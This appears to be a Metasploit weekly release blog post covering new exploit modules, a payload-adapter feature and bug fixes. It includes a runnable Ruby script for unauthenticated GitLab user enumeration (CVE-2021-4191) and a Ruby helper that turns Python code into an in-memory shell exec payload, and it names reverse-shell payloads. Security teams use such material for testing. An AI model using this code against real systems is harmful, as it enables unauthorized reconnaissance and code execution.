Metasploit Weekly Wrap-Up

## CVE-2022-21999 – SpoolFool

![Metasploit Weekly Wrap-Up](https://blog.rapid7.com/content/images/2022/03/metasploit-ascii-1-2.png)

Our very own [Shelby Pace]() has added a new module for the [CVE-2022-21999 SpoolFool privilege escalation vulnerability](). This escalation vulnerability can be leveraged to achieve code execution as SYSTEM. This new module has successfully been tested on Windows 10 (10.0 Build 19044) and Windows Server 2019 v1809 (Build 17763.1577).

## CVE-2021-4191 – Gitlab GraphQL API User Enumeration

[Jake Baines]() has contributed a new module for [CVE-2021-4191](), which queries the GitLab GraphQL API to retrieve the list of GitLab users without authentication. There is some news coverage from earlier this month [here](). The vulnerability affects GitLab 13.0 and later and is fixed in 14.8.2, 14.7.4, and 14.6.5, so the module works against any unpatched release in that range.
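The query the module relies on is ordinary GraphQL: GitLab's `users` connection, paginated with `pageInfo`/`endCursor`, posted to `/api/graphql` with no session cookie or token. The following Ruby script is an added example written for this post, not the Metasploit module's own code; it builds the query, walks every page, and runs offline against constructed sample responses (the `offline_post` stand-in and the `SAMPLE_PAGES` data are assumptions, as is the `first: 100` page size). Against a live target, `post` would wrap a `Net::HTTP` POST to `https://<gitlab>/api/graphql`.

```ruby
require 'json'

# GraphQL document for the unauthenticated `users` query. GitLab's public
# schema paginates connections Relay-style, so we ask for `pageInfo` and
# feed `endCursor` back in as `after` until `hasNextPage` is false.
def build_user_query(after: nil)
  args = after ? "(first: 100, after: #{after.to_json})" : '(first: 100)'
  <<~GQL
    {
      users#{args} {
        nodes { id username name }
        pageInfo { endCursor hasNextPage }
      }
    }
  GQL
end

# Parse one /api/graphql response body into [usernames, next_cursor].
# next_cursor is nil on the last page, or when the instance returns no
# `users` data at all (what a patched instance does for an anonymous caller).
def parse_user_page(body)
  data = JSON.parse(body)
  raise "GraphQL error: #{data['errors'].inspect}" if data['errors']
  conn = data.dig('data', 'users')
  return [[], nil] if conn.nil?
  names = conn.fetch('nodes', []).map { |n| n['username'] }
  page = conn['pageInfo'] || {}
  [names, page['hasNextPage'] ? page['endCursor'] : nil]
end

# Walk every page. `post` is any callable that takes the JSON request body
# and returns the response body. Against a live target it would wrap a
# Net::HTTP POST to https://<gitlab>/api/graphql with no cookie or token.
def enumerate_users(post)
  found = []
  cursor = nil
  loop do
    body = post.call({ query: build_user_query(after: cursor) }.to_json)
    names, cursor = parse_user_page(body)
    found.concat(names)
    break if cursor.nil?
  end
  found.uniq
end

# Constructed sample responses (not captured from any real instance) so the
# script runs offline; a vulnerable target answers in this shape.
SAMPLE_PAGES = [
  { data: { users: {
      nodes: [{ id: 'gid://gitlab/User/1', username: 'root',  name: 'Administrator' },
              { id: 'gid://gitlab/User/2', username: 'alice', name: 'Alice Example' }],
      pageInfo: { endCursor: 'eyJpZCI6IjIifQ', hasNextPage: true } } } }.to_json,
  { data: { users: {
      nodes: [{ id: 'gid://gitlab/User/3', username: 'bob', name: 'Bob Example' }],
      pageInfo: { endCursor: 'eyJpZCI6IjMifQ', hasNextPage: false } } } }.to_json
].freeze

# Stand-in for the HTTP round trip: hands back the sample pages in order.
def offline_post
  pages = SAMPLE_PAGES.dup
  lambda do |request_json|
    JSON.parse(request_json).fetch('query') # the request must be valid JSON
    pages.shift or raise 'client asked for a page the server never offered'
  end
end

puts enumerate_users(offline_post) if __FILE__ == $PROGRAM_NAME
```

A patched instance answers the same query with `users: null` (or an error) for an anonymous caller, which `parse_user_page` treats as an empty final page rather than a crash, so the same script doubles as a quick vulnerable-or-not check.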

## Adapted Payloads

[Spencer McIntyre]() has [added a new payload type]() that allows existing modules to be adapted for new scenarios. Modern exploits frequently deliver OS command payloads, while Metasploit users would often rather have a fully featured native payload such as Meterpreter; until now, bridging that gap was a special case each module author had to handle themselves. Metasploit's new payload adapters convert payloads from one platform and architecture to another for seamless compatibility with a wider variety of exploit modules. The first adapter converts Python payloads into OS command payloads, allowing any exploit capable of executing a Unix command payload to deliver a Python Meterpreter in memory. For additional ease of use, the correct Python binary on the target is determined automatically.
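To make the adapter idea concrete, here is an added Ruby example, written for this post and not the framework's own adapter code, that does the same job in miniature: it takes Python source, base64-encodes it so the host shell cannot mangle it, prepends an interpreter probe, and emits a single command line that runs the code in memory. The `SAMPLE_PYTHON` payload, the `command -v` preference order, and the helper names are assumptions made for the example.

```ruby
require 'base64'

# A throwaway Python payload, constructed for this example: it only reports
# the interpreter and host it ran under, standing in for a real stager.
SAMPLE_PYTHON = <<~PY
  import platform, sys
  print("python %s on %s" % (sys.version.split()[0], platform.node()))
PY

# Interpreter probe prepended to the command so the operator never has to
# know which Python the target ships. The preference order is an assumption.
PYTHON_PROBE = 'PY=$(command -v python3 || command -v python || command -v python2)'

# Turn Python source into a single Unix command line. The source is
# base64-encoded so it carries no quotes or newlines that the host shell, or
# the exploit's own injection point, could break on; the decoded code is
# handed to exec() and never touches disk. The stub contains only base64
# characters, single quotes and parentheses, so double-quoting it is safe.
def python_to_unix_cmd(python_src)
  b64 = Base64.strict_encode64(python_src)
  stub = "exec(__import__('base64').b64decode('#{b64}').decode())"
  "#{PYTHON_PROBE}; [ -n \"$PY\" ] && exec \"$PY\" -c \"#{stub}\""
end

# Inverse direction, useful when reviewing what an adapted payload would
# actually run: pull the base64 blob back out of a generated command.
def recover_python_source(cmd)
  m = cmd.match(/b64decode\('([A-Za-z0-9+\/=]+)'\)/)
  raise 'no adapted Python payload found' unless m
  Base64.strict_decode64(m[1])
end

if __FILE__ == $PROGRAM_NAME
  cmd = python_to_unix_cmd(SAMPLE_PYTHON)
  puts cmd
  puts(recover_python_source(cmd) == SAMPLE_PYTHON ? 'round-trip ok' : 'round-trip FAILED')
end
```

The generated line can be pasted into any exploit that accepts a Unix command payload; if no Python is found on the target the `[ -n "$PY" ]` guard makes the command fail quietly instead of executing a bare `exec ""`.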

## New module content (3)

* [Windows IIS HTTP Protocol Stack DOS]() by Axel Souchet, Maurice LAMBERT, Max, and Stefan Blair, which exploits [CVE-2021-31166]() – A new module has been added that exploits [CVE-2021-31166](), a UAF bug in `http.sys` when parsing `Accept-Encoding` headers, to cause a BSoD and denial of service on vulnerable IIS servers.
* [GitLab GraphQL API User Enumeration]() by jbaines-r7 and mungsul, which exploits [CVE-2021-4191]() – This adds an auxiliary module that enumerates GitLab user accounts via the GraphQL API, which does not require authentication when querying user information.
* [CVE-2022-21999 SpoolFool Privesc]() by Oliver Lyak and Shelby Pace, which exploits [CVE-2022-21999]() – This adds a module targeting SpoolFool (AKA [CVE-2022-21999]()), a local privilege escalation in the Print Spooler service on Windows 10 or Server builds 18362 or earlier.

## Enhancements and features (2)

* [#16186]() from [zeroSteiner]() – This adds an additional Adapter payload type which can be used in a scenario such as wanting to deliver a full Meterpreter session from a command payload.
* [#16262]() from [zeroSteiner]() – This updates the default payload selection so that `cmd/unix/reverse_bash` is chosen over `cmd/unix/reverse_netcat` by default unless `RequiredCmd` is set such that the module cannot execute Bash payloads.

## Bugs fixed (7)

* [#16316]() from [smashery]() – This ensures individual modules no longer accidentally shut down joint services that are used across multiple modules/handlers etc, such as HTTP servers. Modules will now correctly unregister interest in the global service, and if there are no longer any interested modules in the running global service, it will be shut down correctly.
* [#16324]() from [smashery]() – This fixes an issue in the DNS native server module where the server would crash upon receiving a query.
* [#16326]() from [zeroSteiner]() – This fixes SMB signing detection for the `scanner/smb/smb_version` module when the target server has SMB1 disabled.
* [#16332]() from [bcoles]() – This change fixes a bug in APK injection where the native libraries would not automatically be aligned with zipalign, and would fail to install on a device.
* [#16334]() from [bcoles]() – This change fixes a bug where APK files that were not signed with the v1 scheme would fail during the signing phase of APK file injection with msfvenom.
* [#16347]() from [zeroSteiner]() – This updates the `normalize_host` method so that when it attempts and fails to resolve a hostname to an IP address, it will return `nil` instead of raising an exception. Previously this exception would result in modules like `auxiliary/gather/enum_dns` crashing instead of saving the information it had managed to gather on the target so far.
* [#16350]() from [sjanusz-r7]() – This fixes an unintentional crash when using `payload/windows/x64/encrypted_shell_reverse_tcp` without having a database configured.

## Get it

As always, you can update to the latest Metasploit Framework with `msfupdate`
and you can get more details on the changes since the last blog post from
GitHub:

* [Pull Requests 6.1.33…6.1.34]()
* [Full diff 6.1.33…6.1.34]()

If you are a `git` user, you can clone the [Metasploit Framework repo]() (master branch) for the latest.
To install fresh without using git, you can use the open-source-only [Nightly Installers]() or the
[binary installers]() (which also include the commercial edition).
